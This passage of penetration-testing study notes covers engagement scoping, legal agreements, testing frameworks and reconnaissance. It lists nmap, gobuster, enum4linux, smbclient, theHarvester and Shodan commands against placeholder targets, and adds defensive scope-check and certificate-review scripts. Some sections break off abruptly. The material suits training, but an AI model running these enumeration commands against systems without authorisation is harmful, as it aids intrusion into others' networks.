Define what systems, networks, or data are off-limits.
Example: Exclude the production environment to avoid disruptions.
Test Cases
Specify the scenarios and conditions under which the testing will occur.
Example: Testing for SQL injection vulnerabilities in the login module.
Escalation Process
Establish a protocol for addressing critical issues discovered during testing.
Example: Immediate notification to the security team if a critical vulnerability is found.
Testing Window
Determine the timeframe for when testing will occur.
Example: Conduct tests during off-peak hours to minimize business impact.
Key Points:
The timeline for the engagement and when testing can be conducted.
What locations, systems, applications, or other potential targets are in scope.
Types of tests that are allowed or disallowed.
Data handling requirements for information gathered during the penetration test.
What behaviors to expect from the target.
What resources are committed to the test.
Legal concerns.
When and how communications will occur.
Who to contact in case of particular events.
Who is permitted to engage the pentest team.
Agreement Types
Non-Disclosure Agreement (NDA) → Legal documents that help enforce confidential relationships between two parties.
NDAs protect one or more parties in the relationship and typically outline the parties, what information should be considered confidential, how long the agreement lasts, when and how disclosure is acceptable, and how confidential information should be handled.
Master Service Agreement (MSA) → Defines the terms that the organizations will use for future work.
This makes ongoing engagements and SOWs much easier to work through, as the overall MSA is referred to in the SOW, preventing the need to renegotiate terms.
MSAs are common when organizations anticipate working together over a period of time or when a support contract is created.
Statement of Work (SoW) → A document that defines the purpose of the work, what work will be done, what deliverables will be created, the timeline for the work to be completed, the price for the work, and any additional terms and conditions that cover the work.
Alternatives to statements of work include statements of objectives (SOOs) and performance work statements (PWSs), both of which are used by the U.S. government.
Terms of Service (ToS) → Defines the rules that users must agree to abide by to use a service.
Ex. Conditions under which the penetration testing services will be rendered, including acceptable use policies.
Target Selection
Classless Inter-Domain Routing (CIDR) Ranges → Defines a range of IP addresses for network targeting.
Example: The CIDR range 192.168.1.0/24 includes all IP addresses from 192.168.1.0 to 192.168.1.255.
Domains
Specifies domain names to be tested.
Example: Testing example.com and its subdomains (sub.example.com).
Internet Protocol (IP) Addresses
Individual IP addresses selected for penetration testing.
Example: Testing specific servers at 192.168.1.10 and 192.168.1.20.
Uniform Resource Locator (URL)
Specific web addresses within domains targeted for testing.
Example: Testing the URL http://example.com/login for vulnerabilities.
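An added example (not from the original notes) that turns the target-selection items above, plus an exclusion list like the production carve-out at the top of the page, into a check a tester or tooling can run before touching a host. The scope values, hosts and CIDR ranges are constructed placeholders.

```python
"""Scope check for candidate targets: CIDR ranges, domains (with their
subdomains), individual IPs and URLs, with exclusions taking priority.
Added example; every scope value below is a constructed placeholder."""
import ipaddress
from urllib.parse import urlparse

# Constructed rules-of-engagement scope (placeholders, not a real client scope)
IN_SCOPE = {
    "cidrs": ["192.168.1.0/24"],
    "domains": ["example.com"],            # an entry here also covers its subdomains
    "ips": ["10.0.5.7"],
    "urls": ["http://example.com/login"],  # a specific URL, matched by prefix
}
EXCLUDED = {
    "cidrs": ["192.168.1.128/25"],         # e.g. the production half of the range
    "domains": ["prod.example.com"],
}


def _parse_ip(text):
    """Return an ip_address object, or None if the text is not an IP literal."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def _in_cidrs(addr, cidrs):
    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


def _under_domains(host, domains):
    """True if host equals one of the domains or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def in_scope(target, allowed=IN_SCOPE, excluded=EXCLUDED):
    """Return (allowed, reason) for an IP, hostname or URL. Exclusions win."""
    if "://" in target:
        host = urlparse(target).hostname
        if host is None:
            return False, "unparseable URL"
    else:
        host = target.strip()
    addr = _parse_ip(host)
    if addr is not None:
        if _in_cidrs(addr, excluded["cidrs"]):
            return False, "IP falls in an excluded CIDR range"
        if str(addr) in allowed["ips"] or _in_cidrs(addr, allowed["cidrs"]):
            return True, "IP is in scope"
        return False, "IP not listed in scope"
    if _under_domains(host, excluded["domains"]):
        return False, "host is under an excluded domain"
    if _under_domains(host, allowed["domains"]):
        return True, "host is under an in-scope domain"
    if any(target.startswith(u) for u in allowed["urls"]):
        return True, "URL matches a listed in-scope URL"
    return False, "host not listed in scope"


if __name__ == "__main__":
    for t in ["192.168.1.10", "192.168.1.200", "sub.example.com",
              "prod.example.com", "evil-example.com", "http://example.com/login"]:
        print(t, "->", in_scope(t))
```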
Assessment Types
Web
Focuses on identifying vulnerabilities in web applications and websites.
Example: Testing for cross-site scripting (XSS) and SQL injection.
Comparison: Web assessments often involve different tools and techniques than network assessments due to the nature of web technologies.
Network
Examines network infrastructure, including routers, switches, and firewalls, for security weaknesses.
Example: Scanning for open ports, weak configurations, and vulnerabilities in network devices.
Comparison: Network assessments are more focused on connectivity and data flow between systems, unlike web or mobile assessments.
Mobile
Targets vulnerabilities in mobile applications and devices.
Example: Testing for insecure data storage, insufficient encryption, and insecure communication in a mobile app.
Comparison: Mobile assessments require different skill sets and tools compared to web and network assessments due to the unique operating systems and application environments.
Cloud
Assesses security of cloud-based infrastructure, platforms, and services.
Example: Evaluating the security of AWS, Azure, or Google Cloud configurations.
Comparison: Cloud assessments involve understanding cloud-specific security practices and compliance requirements, different from on-premises assessments.
Application Programming Interface (API)
Examines the security of APIs, which facilitate communication between different software components.
Example: Testing for insecure authentication, authorization, and input validation in APIs.
Comparison: API assessments are specialized and focus on data exchange mechanisms, unlike general application assessments.
Application
Broad category encompassing the assessment of software applications, including desktop and enterprise applications.
Example: Testing for buffer overflows, improper error handling, and insecure code practices.
Comparison: Application assessments are broader and can include aspects of web, mobile, and API assessments.
Wireless
Focuses on the security of wireless networks, including Wi-Fi and Bluetooth.
Example: Testing for weak encryption protocols (e.g., WEP), unauthorized access points, and insecure wireless configurations.
Comparison: Wireless assessments require specific tools and techniques, such as Wi-Fi sniffers and signal analyzers, differing from wired network assessments.
Shared Responsibility Model
Hosting Provider Responsibilities
Infrastructure Security: Ensuring the physical and foundational security of servers, storage, and networking components.
Example: Data center security, hardware maintenance, and network security (e.g., DDoS protection).
Compliance: Adhering to regulatory and industry standards.
Example: Compliance with SOC 2, ISO 27001, or PCI-DSS for data protection and privacy.
Customer Responsibilities
Data Security: Protecting data within the cloud environment, including encryption and access controls.
Example: Encrypting sensitive data stored in cloud databases.
Configuration Management: Properly configuring cloud services and resources.
Example: Setting up secure configurations for virtual machines and storage buckets to prevent unauthorized access.
User Access Management: Managing user identities and access to resources.
Example: Implementing multi-factor authentication (MFA) and least privilege access controls.
Penetration Tester Responsibilities
Testing Authorization: Obtaining necessary permissions to conduct penetration testing.
Example: Securing formal approval from both the customer and hosting provider before initiating tests.
Scope Adherence: Testing within the agreed-upon scope and respecting rules of engagement.
Example: Only testing authorized systems and avoiding any non-approved systems or data.
Vulnerability Reporting: Providing detailed reports on discovered vulnerabilities and recommendations for remediation.
Example: Creating comprehensive reports with clear, actionable recommendations for improving security.
Third-Party Responsibilities
Service Integration Security: Ensuring the security of third-party services integrated into the customer’s environment.
Example: Securely integrating third-party payment processors or authentication services.
Compliance and Audits: Adhering to relevant compliance requirements and undergoing regular security audits.
Example: Ensuring third-party vendors comply with GDPR or HIPAA regulations as required.
Incident Response: Collaborating in incident response activities when security breaches involve third-party services.
Example: Coordinating with third-party providers to quickly address and mitigate breaches.
Legal and Ethical Considerations
Authorization Letters
Purpose: Formal documents granting permission to conduct penetration testing.
Example: A written authorization from a company’s senior management allowing a pentester to test specific systems.
Importance: Protects both the client and the tester legally, ensuring all parties are aware of the testing activities.
Content: Should include scope, timeframe, and any limitations of the test.
Example: An authorization letter specifying the systems to be tested, the methods to be used, and the duration of the testing period.
Mandatory Reporting Requirements
Legal Obligation: Certain vulnerabilities or breaches must be reported to relevant authorities or stakeholders.
Example: Reporting discovered vulnerabilities to the organization’s security team and, if applicable, to regulatory bodies.
Compliance: Adhering to industry standards and regulations that mandate reporting.
Example: GDPR requires notifying authorities within 72 hours of discovering a data breach.
Ethical Responsibility: Ensuring transparency and accountability by reporting findings that could impact stakeholders.
Example: Reporting a critical vulnerability in a financial system that could lead to significant data loss or theft.
Risk to the Penetration Tester
Legal Risks: Potential legal consequences if testing is done without proper authorization.
Example: Facing charges of unauthorized access or data tampering if tests are conducted without explicit permission.
Physical Risks: Possible dangers when testing physical security controls or on-site systems.
Example: Risk of injury when physically accessing and testing security of data centers or other secure facilities.
Professional Risks: Reputation and career implications if testing is conducted unethically or results are mishandled.
Example: Loss of credibility or job if a tester fails to disclose a significant vulnerability or mishandles sensitive information.
Objective 1.2
Peer Review
Purpose: Ensures accuracy and thoroughness of the penetration testing results through review by fellow security professionals.
Example: A pentester’s report is reviewed by another team member for completeness and accuracy.
Stakeholder Alignment
Purpose: Ensures all relevant parties are informed and in agreement with the objectives and scope of the penetration test.
Example: Regular meetings with IT, security teams, and management to align on testing goals and expectations.
Importance: Facilitates a unified approach and understanding among stakeholders.
Outcome: Cohesive and coordinated efforts towards improving security.
Root Cause Analysis
Purpose: Identifies the underlying reasons for discovered vulnerabilities or security issues.
Example: Analyzing why a SQL injection vulnerability existed in an application’s code.
Importance: Helps prevent recurrence by addressing the fundamental issues rather than just symptoms.
Outcome: Implementation of long-term fixes and improvements in security practices.
Escalation Path
Purpose: Defines a clear process for escalating critical issues discovered during testing.
Example: Immediate notification to senior management if a critical vulnerability is found.
Importance: Ensures swift action and decision-making to address serious risks.
Outcome: Timely and effective mitigation of critical vulnerabilities.
Secure Distribution
Purpose: Ensures sensitive findings and reports are shared securely with authorized personnel only.
Example: Using encrypted emails or secure portals to share test results.
Importance: Protects sensitive information from unauthorized access and potential misuse.
Outcome: Maintains confidentiality and integrity of the findings.
Articulation of Risk, Severity, and Impact
Purpose: Clearly communicates the risks, severity, and potential impact of identified vulnerabilities.
Example: Explaining the potential business impact of a critical vulnerability in layman’s terms to non-technical stakeholders.
Importance: Helps stakeholders understand the urgency and significance of the findings.
Outcome: Informed decision-making regarding remediation priorities and resource allocation.
Goal Reprioritization
Purpose: Adjusts testing and remediation goals based on new findings and evolving business needs.
Example: Shifting focus to newly discovered critical vulnerabilities that pose immediate risks.
Importance: Ensures resources are effectively utilized to address the most pressing security issues.
Outcome: Dynamic and responsive approach to penetration testing and remediation.
Business Impact Analysis
Purpose: Assesses the potential impact of vulnerabilities on business operations.
Example: Evaluating how a vulnerability could affect customer data and business continuity.
Importance: Provides context for understanding the real-world implications of security issues.
Outcome: Prioritized remediation efforts based on business risk.
Client Acceptance
Purpose: Obtains formal approval from the client for the findings, recommendations, and remediation plan.
Example: Presenting the final report to the client and gaining their agreement on the next steps.
Importance: Ensures client buy-in and commitment to implementing recommended security measures.
Outcome: Successful collaboration and alignment on security improvements.
Objective 1.3
Open Source Security Testing Methodology Manual (OSSTMM)
Purpose: Provides a comprehensive methodology for security testing and analysis.
A broad penetration testing methodology guide with information about analysis, metrics, workflows, human security, physical security, and wireless security. Unfortunately, it has not been updated since 2010, resulting in more modern techniques and technologies not being included in the manual.
Council of Registered Ethical Security Testers (CREST)
Purpose: Offers accreditation and certification for organizations and individuals in the security testing industry.
Key Features: Sets professional standards for security testing and provides guidelines and certifications.
Penetration Testing Execution Standard (PTES)
Purpose: Provides a detailed framework for performing penetration testing.
It ranges from pre-engagement interactions like scoping and questions to ask clients, to details such as how to deal with third parties.
It also includes a full range of penetration testing techniques and concepts, making it one of the most complete and modern openly available penetration testing standards.
OWASP Top 10
Purpose: Lists the top 10 most critical web application security risks.
Key Features: Focuses on prevalent and severe web application vulnerabilities like SQL injection, XSS, and more.
OWASP Mobile Application Security Verification Standard (MASVS)
Purpose: Provides a framework for securing mobile applications.
Key Features: Defines security requirements and verification levels for mobile app security.
Purdue Model
Purpose: A reference model for industrial control systems (ICS) security.
Key Features: Divides ICS networks into different levels, each with specific security considerations.
The Purdue Model, also known as the Purdue Enterprise Reference Architecture (PERA), is a widely accepted framework used to segment and secure Industrial Control Systems (ICS) environments.
It organizes the ICS architecture into multiple layers, each with specific roles and security requirements.
This model helps in understanding how to effectively secure and manage different components of an ICS network.
Layers of the Purdue Model
Level 0: Physical Process
Description: The actual physical processes and machinery, including sensors, actuators, and other devices that interact directly with the physical environment.
Examples:
Sensors measuring temperature, pressure, or flow rates.
Actuators controlling valves, motors, or pumps.
Level 1: Basic Control
Description: The control devices that directly manage Level 0 equipment, often referred to as programmable logic controllers (PLCs) or remote terminal units (RTUs).
Examples:
PLCs and RTUs executing control logic to automate processes.
Human-Machine Interfaces (HMIs) at the local control level.
Level 2: Supervisory Control
Description: Systems that provide supervisory control and data acquisition (SCADA) functions, aggregating data from Level 1 and providing oversight and control.
Examples:
SCADA systems for real-time monitoring and control.
HMIs at the supervisory control level.
Level 3: Operations Management
Description: Systems used for production control, including batch management, production scheduling, and other operational functions.
Examples:
Manufacturing Execution Systems (MES) managing production workflows.
Systems for coordinating production processes and ensuring quality control.
Level 4: Enterprise Systems
Description: Enterprise-level systems that manage business logistics, planning, and enterprise resource management.
Examples:
Enterprise Resource Planning (ERP) systems.
Customer Relationship Management (CRM) systems.
Level 5: External Networks
Description: Connections to external networks, including business partners, suppliers, and the internet.
Secure Software Development Life Cycle (SDLC): Integrates security into the software development process to produce secure software.
Minimum Password Requirements: Sets baseline standards for password creation to enhance account security.
Policies and Procedures: Establishes a framework for organizational security practices and employee behavior, supported by training and awareness programs.
Operational Controls
Job Rotation: Reduces risk of fraud and errors by changing employees' roles periodically.
Time-of-Day Restrictions: Limits access to specific times to reduce unauthorized access risks.
Mandatory Vacations: Detects and prevents fraudulent activities by requiring regular vacations.
User Training: Educates employees on security policies and best practices to reduce human error and enhance overall security.
Physical Controls
Access Control Vestibule: Controls and monitors entry to secure areas, preventing unauthorized access.
Biometric Controls: Authenticates individuals using unique biological characteristics for high security.
Video Surveillance: Monitors and records activities to deter unauthorized actions and provide evidence.
Chapter 2
Objective 2.1
Active and Passive Reconnaissance
Active Reconnaissance → Actively interacts with the target system or network to gather information.
Methods: Port scanning, ping sweeps, banner grabbing, social engineering.
Risks: High detection risk, potential legal issues.
Importance: Provides detailed and actionable information about the target's systems and vulnerabilities.
Passive Reconnaissance → Gathers information about the target without directly interacting with the target system or network.
Methods: OSINT, WHOIS lookup, DNS enumeration, social media monitoring, website analysis.
Benefits: Stealthy, reduces legal risk.
Importance: Gathers initial information about the target without direct interaction, forming a foundation for further active reconnaissance.
Open-Source Intelligence (OSINT)
Social Media: Gathers personal and organizational information for social engineering and intelligence.
Examples:
LinkedIn: Identifying key employees, organizational structure, and technology stack used.
Facebook/Twitter: Gathering personal information, behaviors, and affiliations.
Importance: Provides insights into potential targets, their roles, and publicly shared information that can be leveraged in social engineering attacks.
Job Boards: Identifies technologies and potential vulnerabilities based on job postings.
Examples:
Indeed/Glassdoor: Reviewing job listings to find out what technologies and skills are sought by the target organization.
Importance: Reveals information about the organization's IT environment, security tools, and potential vulnerabilities based on required skills.
Scan Code Repositories: Searches for sensitive information and code vulnerabilities in public repositories.
Examples:
GitHub/GitLab: Searching for exposed credentials, API keys, or sensitive configuration files.
Importance: Uncovers potentially exploitable information and code vulnerabilities that can be used in an attack.
Domain Name System (DNS)
DNS Lookups: Retrieves domain configuration details.
Example: Using nslookup or dig to retrieve A, MX, and CNAME records.
Reverse DNS Lookups: Maps IP addresses to domain names.
Example: Using host command to find domains pointing to an IP address.
Importance: Helps map out the target's network structure and identify potential entry points.
Cached Pages: Accesses historical web page versions to find removed or altered information.
Examples:
Wayback Machine: Viewing archived versions of a website to find old, possibly insecure configurations or sensitive information.
Importance: Provides access to information that has been removed or altered, which can be valuable in understanding historical security practices and changes.
Cryptographic Flaws: Identifies weaknesses in encryption implementations.
Examples:
SSL/TLS Analysis: Using tools like SSL Labs to assess the security of a website’s SSL/TLS configuration.
Importance: Detects vulnerabilities in encryption that could be exploited to intercept or manipulate data.
Password Dumps: Uses leaked credentials to find potential entry points.
Examples:
Have I Been Pwned: Checking if the target's email addresses have been compromised in data breaches.
Importance: Provides potential entry points if reused or weak passwords are found in the dumps.
Network Reconnaissance
Purpose: To gather information about a target network, identifying its structure, devices, services, and potential vulnerabilities. This information is crucial for planning and executing further penetration testing activities.
Network Scanning
Purpose: Identifies active devices, open ports, and services.
Tools: Nmap, Angry IP Scanner.
Examples: Scanning a subnet to identify all active hosts.
Ping Sweeps
Purpose: Discovers active devices using ICMP echo requests.
Tools: Fping, Nmap.
Examples: Using fping to ping all devices in a subnet.
Port Scanning
Purpose: Identifies open ports and running services.
Tools: Nmap, Masscan.
Examples: Performing a SYN scan to identify open ports.
OS Fingerprinting
Purpose: Determines the operating system of a target device.
Tools: Nmap, Xprobe2.
Examples: Using Nmap’s OS detection feature.
Service Enumeration
Purpose: Gathers detailed information about services on open ports.
Tools: Nmap, Netcat.
Examples: Identifying the version of a web server running on port 80.
Network Mapping
Purpose: Creates a visual representation of the network topology.
Tools: Nmap with Zenmap, SolarWinds Network Topology Mapper.
Examples: Visualizing network scan results with Zenmap.
DNS Enumeration
Purpose: Gathers information about the target’s DNS infrastructure.
Tools: DNSRecon, Fierce.
Examples: Listing all DNS records for a target domain.
Protocol Scanning
Purpose: Protocol scanning aims to identify open ports and the services running on them by sending packets to various ports on a target system. It helps in understanding which services are exposed and potentially vulnerable.
TCP Scanning
Purpose: Identifies open TCP ports and services by analyzing TCP packet responses.
Tools: Nmap, Masscan.
Types:
SYN Scan: Stealthy, sends SYN packets.
Connect Scan: Completes the TCP handshake, more detectable.
FIN, Xmas, Null Scans: Use specific TCP flags to elicit responses from closed ports.
Examples: nmap -sS target_ip, nmap -sT target_ip.
UDP Scanning
Purpose: Identifies open UDP ports and services by sending UDP packets and analyzing responses.
Tools: Nmap, Unicornscan.
Examples: nmap -sU target_ip.
Challenges: Less reliable due to the stateless nature of UDP and ICMP rate limiting.
Certificate Transparency Logs
Purpose: Monitors and audits digital certificates issued by Certificate Authorities (CAs) to detect malicious or misissued certificates.
Tools:
crt.sh: A website for searching Certificate Transparency logs.
Google Certificate Transparency: A project providing public logs of issued certificates.
Examples:
Using crt.sh to find all certificates issued for a target domain.
Importance: Helps identify rogue or unexpected certificates, which can indicate potential man-in-the-middle (MITM) attacks or unauthorized domain usage.
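An added example (not from the original notes) of the defensive side of the crt.sh lookup above: reviewing a domain's CT log entries for certificates from an unapproved CA, names missing from the host inventory, or wildcards. The entries are constructed and only modelled on the crt.sh JSON field names (issuer_name, common_name, name_value, not_before, not_after); the approved-CA list and host inventory are placeholders.

```python
"""Review Certificate Transparency entries for unexpected certificates.
Added example; the log entries, CA allow-list and inventory are constructed."""
import json

APPROVED_ISSUERS = ("Let's Encrypt", "DigiCert")   # constructed allow-list of CA names
KNOWN_HOSTS = {"example.com", "www.example.com", "mail.example.com"}  # constructed inventory

# Constructed sample modelled on crt.sh's JSON output (not real log data)
SAMPLE_CT_JSON = json.dumps([
    {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2024-01-10T00:00:00", "not_after": "2024-04-09T23:59:59"},
    {"id": 2, "issuer_name": "C=US, O=Unknown CA Ltd, CN=Unknown CA",
     "common_name": "vpn.example.com",
     "name_value": "vpn.example.com",
     "not_before": "2024-02-01T00:00:00", "not_after": "2025-02-01T00:00:00"},
    {"id": 3, "issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "*.example.com",
     "name_value": "*.example.com\nexample.com",
     "not_before": "2024-03-05T00:00:00", "not_after": "2025-03-05T23:59:59"},
])


def _names(entry):
    """All DNS names on the certificate: crt.sh lists SANs one per line in name_value."""
    names = set(entry.get("name_value", "").split("\n"))
    names.add(entry.get("common_name", ""))
    return {n.strip().lower() for n in names if n.strip()}


def review_ct_entries(raw_json, approved_issuers=APPROVED_ISSUERS, known_hosts=KNOWN_HOSTS):
    """Return one finding per suspicious certificate: {'id', 'names', 'not_before', 'reasons'}."""
    findings = []
    for entry in json.loads(raw_json):
        reasons = []
        issuer = entry.get("issuer_name", "")
        # A certificate from a CA the organisation never uses is the classic CT signal
        if not any(ca.lower() in issuer.lower() for ca in approved_issuers):
            reasons.append("issuer not on approved-CA list: " + issuer)
        names = _names(entry)
        wildcards = sorted(n for n in names if n.startswith("*."))
        if wildcards:
            reasons.append("wildcard names: " + ", ".join(wildcards))
        # Names the inventory does not know about point at forgotten or rogue hosts
        unknown = sorted(n for n in names - set(known_hosts) if not n.startswith("*."))
        if unknown:
            reasons.append("names not in host inventory: " + ", ".join(unknown))
        if reasons:
            findings.append({"id": entry.get("id"), "names": sorted(names),
                             "not_before": entry.get("not_before"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_ct_entries(SAMPLE_CT_JSON):
        print(f["id"], f["not_before"], "; ".join(f["reasons"]))
```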
Information Disclosure
Purpose: Identifies unintentional leakage of sensitive information through various channels.
Examples:
Error Messages: Examining error messages that reveal software versions, paths, or other sensitive details.
Metadata: Analyzing document properties for hidden information like author names, software versions, etc.
Source Code: Checking for comments in HTML or other code that disclose internal workings or credentials.
Importance: Detecting and mitigating information disclosure reduces the risk of attackers leveraging this information for more targeted attacks.
Search Engine Analysis/Enumeration
Purpose: Uses search engines to find sensitive information or entry points exposed on the web.
Tools:
Google Dorking: Using advanced search operators to find exposed information.
Shodan: Search engine for Internet-connected devices.
Examples:
Using Google dorks to find publicly accessible login pages or sensitive files.
Example: site:example.com inurl:login
Importance: Uncovers publicly accessible information that might be overlooked, providing attackers with valuable data.
Network Sniffing
Purpose: Captures and analyzes network traffic to gather information about the network and the devices on it.
Tools:
Wireshark: Popular network protocol analyzer.
tcpdump: Command-line packet analyzer.
Examples:
Capturing traffic to identify protocols in use, active devices, and potential vulnerabilities.
Importance: Provides insights into network communication patterns, potential vulnerabilities, and security posture.
IoT and Operational Technology (OT) Protocols
Purpose: Identifies and analyzes protocols used in IoT and OT environments.
Examples:
Modbus, DNP3: Commonly used in industrial control systems (ICS).
MQTT, CoAP: Used in IoT communication.
Importance: Understanding these protocols helps in identifying vulnerabilities specific to IoT and OT environments, which are often overlooked but critical for industrial and smart devices.
Banner Grabbing
Purpose: Collects banners from network services to identify the software and version running on them.
Tools:
Netcat: Basic network utility for reading from and writing to network connections.
Nmap: Supports banner grabbing with service detection.
Examples:
Using Netcat to connect to an open port and capture the service banner.
Command: nc target_ip port
Importance: Identifies software versions and configurations, which can be matched against known vulnerabilities for further exploitation.
HTML Scraping
Purpose: Extracts information from web pages to gather intelligence about the target.
Tools:
Beautiful Soup: Python library for web scraping.
Scrapy: Python framework for web scraping.
Examples:
Scraping a website for email addresses, internal links, or other useful information.
Importance: Automates the process of extracting valuable information from web pages, which can be used for further analysis or attacks.
Objective 2.2
Operating System (OS) Fingerprinting
Purpose: Determines the operating system of a target device.
Tools:
Nmap: Includes OS detection capabilities.
Xprobe2: Active OS fingerprinting tool.
Examples:
Using Nmap’s OS detection feature to identify the operating system running on a target server.
Command: nmap -O target_ip
Importance: Helps tailor further attacks to the specific operating systems identified, improving the chances of successful exploitation.
Service Discovery
Purpose: Identifies services running on open ports and gathers detailed information about them.
Tools:
Nmap: Service version detection.
Netcat: Versatile tool for interacting with network services.
Examples:
Using Nmap to identify the version of a web server running on port 80.
Command: nmap -sV target_ip
Importance: Provides detailed information about the services, including software versions, which can be used to identify known vulnerabilities.
Protocol Enumeration
Purpose: Identifies and gathers information about the protocols in use on the target network.
Tools:
Wireshark: Network protocol analyzer.
Nmap: Supports various protocol scans.
Examples:
Using Nmap to scan for specific protocols such as SMB, FTP, and SSH.
Command: nmap -sV -p 21,22,139 target_ip
Importance: Helps in understanding the communication protocols used, which is crucial for identifying potential vulnerabilities.
DNS Enumeration
Purpose: Gathers information about the target’s DNS infrastructure.
Tools:
DNSRecon: DNS enumeration tool.
Fierce: DNS reconnaissance tool.
Examples:
Using DNSRecon to list all DNS records for a target domain.
Command: dnsrecon -d target_domain
Importance: Identifies domain names, subdomains, and associated IP addresses, which can provide additional targets for further reconnaissance.
Directory Enumeration
Purpose: Identifies and lists directories and files on web servers.
Tools:
DirBuster: Web directory scanner.
Gobuster: Directory and file brute-forcer.
Examples:
Using Gobuster to find hidden directories and files on a web server.
Command: gobuster dir -u target_url -w wordlist.txt
Importance: Helps identify hidden resources that might contain sensitive information or provide entry points for attacks.
Host Discovery
Purpose: Identifies active hosts on a network.
Tools:
Nmap: Network scanning tool.
Ping Sweep: Using ping to identify live hosts.
Examples:
Using Nmap to discover hosts on a network.
Command: nmap -sn target_subnet
Importance: Provides a list of active devices, which can be targeted for further analysis.
Share Enumeration
Purpose: Identifies shared resources on a network, such as file shares.
Tools:
SMBclient: Command-line tool for accessing SMB/CIFS resources.
enum4linux: Linux tool for enumerating information from Windows systems.
Examples:
Using SMBclient to list shared resources on a Windows server.
Command: smbclient -L //target_ip
Importance: Identifies shared resources that might contain sensitive information or provide entry points for attacks.
Local User Enumeration
Purpose: Identifies user accounts on a target system.
Tools:
enum4linux: Tool for enumerating information from Windows systems.
rpcclient: Command-line tool for interacting with Windows RPC services.
Examples:
Using enum4linux to list user accounts on a Windows system.
Command: enum4linux -U target_ip
Importance: Helps in identifying potential user accounts that can be targeted for password attacks or privilege escalation.
Email Account Enumeration
Purpose: Identifies email accounts associated with a target domain.
Tools:
theHarvester: Tool for gathering emails, subdomains, and more.
Hunter.io: Web service for finding email addresses.
Examples:
Using theHarvester to find email addresses associated with a target domain.
Command: theHarvester -d target_domain -b google
Importance: Identifies potential targets for phishing attacks or social engineering.
Wireless Enumeration
Purpose: Identifies wireless networks and gathers information about them.
Tools:
Kismet: Wireless network detector, sniffer, and intrusion detection system.
Aircrack-ng: Suite of tools for wireless network security.
Examples:
Using Kismet to discover wireless networks and their configurations.
Importance: Helps in identifying wireless networks, their security configurations, and potential vulnerabilities.
Permission Enumeration
Purpose: Identifies permissions and access controls on resources.
Tools:
AccessChk: Windows tool for viewing permissions.
Linux file permissions commands: Using ls -l to view file permissions.
Examples:
Using AccessChk to list permissions on a Windows file or directory.
Command: accesschk.exe -s target_directory
Importance: Helps in identifying overly permissive access controls, which can be exploited for privilege escalation or unauthorized access.
Secrets Enumeration
Purpose: Identifies sensitive information such as credentials, access keys, and tokens that can be used to gain unauthorized access.
Tools:
TruffleHog: Searches through git repositories for secrets.
AWS IAM Access Analyzer: Identifies permissions and access keys in AWS environments.
Examples:
Cloud Access Keys: Using TruffleHog to search for AWS keys in a Git repository.
Examples: Boolean, string, and arithmetic operators in Bash and Python.
Use of Libraries, Functions, and Classes
Libraries: Leverage existing functionalities (e.g., requests in Python).
Functions: Encapsulate reusable code.
Classes: Define data structures and behaviors.
Objective 2.4
Wayback Machine
Purpose: Archive of web pages; allows viewing of historical versions of websites.
Usage: Check past versions of a target site for exposed sensitive information or vulnerabilities.
Example: Visiting archive.org to look at past snapshots of target_site.com.
Maltego
Purpose: Data mining tool; visualizes relationships between people, companies, domains, etc.
Maltego is a powerful data mining and link analysis tool developed by Paterva.
It is used for gathering and connecting information across various platforms, helping users visualize complex relationships among people, groups, websites, domains, networks, and other entities.
Maltego is widely utilized in cybersecurity, open-source intelligence (OSINT), forensic investigations, and threat intelligence.
Usage: Generate graphs that display the interconnections between different pieces of information.
Example: Using Maltego to map out relationships between email addresses, domains, and social media profiles.
Recon-ng
Purpose: Open-source web reconnaissance framework.
Usage: Automate the process of gathering open-source intelligence.
Example: Running modules in Recon-ng to gather email addresses from a domain.
Shodan
Purpose: Search engine for Internet-connected devices.
Usage: Find devices with specific vulnerabilities or configurations.
Example: Using Shodan to find all exposed webcams.
Command: shodan search "webcamxp"
SpiderFoot
Purpose: Automated OSINT tool; collects data from various sources.
SpiderFoot is an open-source intelligence (OSINT) automation tool used for reconnaissance and information gathering.
It automates the process of collecting intelligence on IP addresses, domain names, email addresses, and other entities.
SpiderFoot scans multiple data sources to build a detailed profile of the target, making it a valuable tool for penetration testers, security researchers, and threat analysts.
Usage: Automate the collection of information about a target.
Example: Running a scan in SpiderFoot to gather data on a target domain.
Command: python3 spiderfoot.py -s target.com
WHOIS
Purpose: Look up domain registration information.
Usage: Find ownership and contact information for a domain.
Example: Using a WHOIS lookup tool to find the registrant's information for target.com
Command: whois target.com
nslookup/dig
Purpose: DNS lookup utilities.
Usage: Retrieve DNS records for a domain.
Example:
nslookup: nslookup target.com
dig: dig target.com
Censys.io
Purpose: Search engine for internet-connected devices.
Usage: Find devices, services, and vulnerabilities.
Example: Searching Censys for devices running specific software versions.
Hunter.io
Purpose: Email address search engine.
Usage: Find email addresses associated with a domain.
Example: Using Hunter.io to find contact emails for target.com.
DNSdumpster
Purpose: DNS recon and research tool.
DNSdumpster is an online tool that provides comprehensive domain reconnaissance by performing DNS enumeration and gathering information about the DNS infrastructure of a given domain.
It helps security researchers, penetration testers, and IT professionals map out the external network infrastructure associated with a domain, including subdomains, mail servers, and other DNS records.
Usage: Find DNS records and subdomains for a target.
Example: Using DNSdumpster to find subdomains for target.com.
Amass
Purpose: In-depth DNS enumeration tool.
Amass is an open-source tool developed by the OWASP (Open Web Application Security Project) foundation, designed for in-depth network mapping and external asset discovery.
It is particularly effective for DNS enumeration, subdomain discovery, and reconnaissance.
Amass uses multiple techniques to gather information about a target domain, including active and passive methods, and integrates data from various sources to provide comprehensive results.
Usage: Discover subdomains and map out network structures.
Example: Running Amass to enumerate subdomains of target.com.
Command: amass enum -d target.com
Nmap
Purpose: Network scanning tool.
Usage: Discover hosts and services on a network.
Example:
Basic Scan: nmap target_ip
Nmap Scripting Engine (NSE): Extend Nmap functionality with scripts.
Example Script: nmap --script http-enum target_ip
theHarvester
Purpose: Gather emails, subdomains, hosts, and more from public sources.
Usage: OSINT gathering tool.
Example: theHarvester -d target.com -b google
WiGLE.net
Purpose: Wireless network mapping service.
WiGLE.net (Wireless Geographic Logging Engine) is an online service that aggregates data on the locations of wireless networks worldwide.
